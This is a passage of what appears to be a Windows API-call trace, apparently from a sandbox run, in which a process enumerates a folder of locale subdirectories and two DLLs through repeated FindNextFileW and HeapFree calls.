nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="cs", cAlternateFileName="")) returned 1 [0069.404] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0069.404] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6165f55, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6165f55, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6165f55, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="da", cAlternateFileName="")) returned 1 [0069.404] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0069.405] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6224b6a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6224b6a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6224b6a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="de", cAlternateFileName="")) returned 1 [0069.405] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0069.405] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff0bc27, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeff0bc27, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeff31e88, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="el", cAlternateFileName="")) returned 1 [0069.405] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0069.405] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5a3de35, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf5a3de35, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf5a3de35, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="en-us", cAlternateFileName="")) returned 1 [0069.405] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0069.405] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfcb7dd00, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfcb7dd00, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfcb7dd00, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="es", cAlternateFileName="")) returned 1 [0069.406] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0069.406] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fd9ab, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x7fd9ab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x7fd9ab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="et", cAlternateFileName="")) returned 1 [0069.407] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0069.407] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x37869c8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x37869c8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x37869c8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="eu", cAlternateFileName="")) returned 1 [0069.407] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0069.407] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc53b9f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc53b9f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc53b9f9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="fi", cAlternateFileName="")) returned 1 [0069.407] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0069.407] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fd9ab, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x7fd9ab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x7fd9ab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="fr", cAlternateFileName="")) returned 1 [0069.407] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0069.407] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa178468, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa178468, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa178468, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="gl", cAlternateFileName="")) returned 1 [0069.408] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0069.408] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf618b1a4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf618b1a4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf618b1a4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="he", cAlternateFileName="")) returned 1 [0069.408] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0069.408] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56853a0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x56853a0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x56853a0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="hi", cAlternateFileName="")) returned 1 [0069.409] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0069.409] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf480feb5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf480feb5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf480feb5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="hr", cAlternateFileName="")) returned 1 [0069.409] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0069.409] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4646280, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4646280, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4646280, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="hu", cAlternateFileName="")) returned 1 [0069.409] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0069.409] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x63a229e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x63a229e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x63a229e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="id", cAlternateFileName="")) returned 1 [0069.410] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0069.410] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x18ae17b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18ae17b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18ae17b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x10fcc8, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ipcsecproc.dll", cAlternateFileName="IPCSEC~1.DLL")) returned 1 [0069.410] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0069.410] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6aef645, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6aef645, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6aef645, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ja", cAlternateFileName="")) returned 1 [0069.411] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0069.411] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6781ff8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6781ff8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x67a8250, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="kk", cAlternateFileName="")) returned 1 [0069.411] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0069.411] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5f9c329, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5f9c329, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5f9c329, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ko", cAlternateFileName="")) returned 1 [0069.411] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0069.411] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1bce2f5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1bce2f5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1bf45a7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="lt", cAlternateFileName="")) returned 1 [0069.411] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0069.411] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf13037fa, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf13037fa, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf13037fa, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="lv", cAlternateFileName="")) returned 1 [0069.413] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0069.413] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc21a8ad, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc21a8ad, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc21a8ad, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ms", cAlternateFileName="")) returned 1 [0069.414] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0069.414] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf0dcc568, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf0dcc568, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1b3ce622, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f9f00, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="msipc.dll", cAlternateFileName="")) returned 1 [0069.415] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0069.415] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xffe01c35, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xffe01c35, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xffe01c35, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="no", cAlternateFileName="")) returned 1 [0069.417] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0069.417] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x68ff786, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x68ff786, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x69259a9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="pl", cAlternateFileName="")) returned 1 [0069.418] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0069.418] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc2b31ff, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc2b31ff, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc2b31ff, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="pt", cAlternateFileName="")) returned 1 [0069.418] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0069.418] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x386b77a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x386b77a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x386b77a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0069.418] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0069.419] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4903b8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x4903b8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4903b8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ro", cAlternateFileName="")) returned 1 [0069.419] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0069.419] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x86a6c5d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x86a6c5d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x86a6c5d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ru", cAlternateFileName="")) returned 1 [0069.419] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0069.419] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x67a8250, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x67a8250, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x67a8250, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sk", cAlternateFileName="")) returned 1 [0069.419] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0069.419] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a7cf13, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6a7cf13, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6a7cf13, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sl", cAlternateFileName="")) returned 1 [0069.420] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0069.420] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1565dae, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1565dae, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1565dae, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sr-Cyrl-BA", cAlternateFileName="SR-CYR~1")) returned 1 [0069.420] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0069.420] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf443017d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf443017d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf44563cd, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sr-Cyrl-CS", cAlternateFileName="SR-CYR~2")) returned 1 [0069.420] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0069.420] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1ae94c9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1ae94c9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sr-Latn-CS", cAlternateFileName="SR-LAT~1")) returned 1 [0069.935] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0069.936] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6354def, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6354def, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6354def, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sv", cAlternateFileName="")) returned 1 [0069.936] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.936] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb67b102, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfb67b102, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfb6ed802, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="th", cAlternateFileName="")) returned 1 [0069.936] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.936] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc53b9f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc53b9f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc53b9f9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="tr", cAlternateFileName="")) returned 1 [0069.937] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.937] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf80d6078, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf80d6078, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf80d6078, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="uk", cAlternateFileName="")) returned 1 [0069.937] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.937] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c46ba0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6c46ba0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6c46ba0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="vi", cAlternateFileName="")) returned 1 [0069.937] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.937] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: 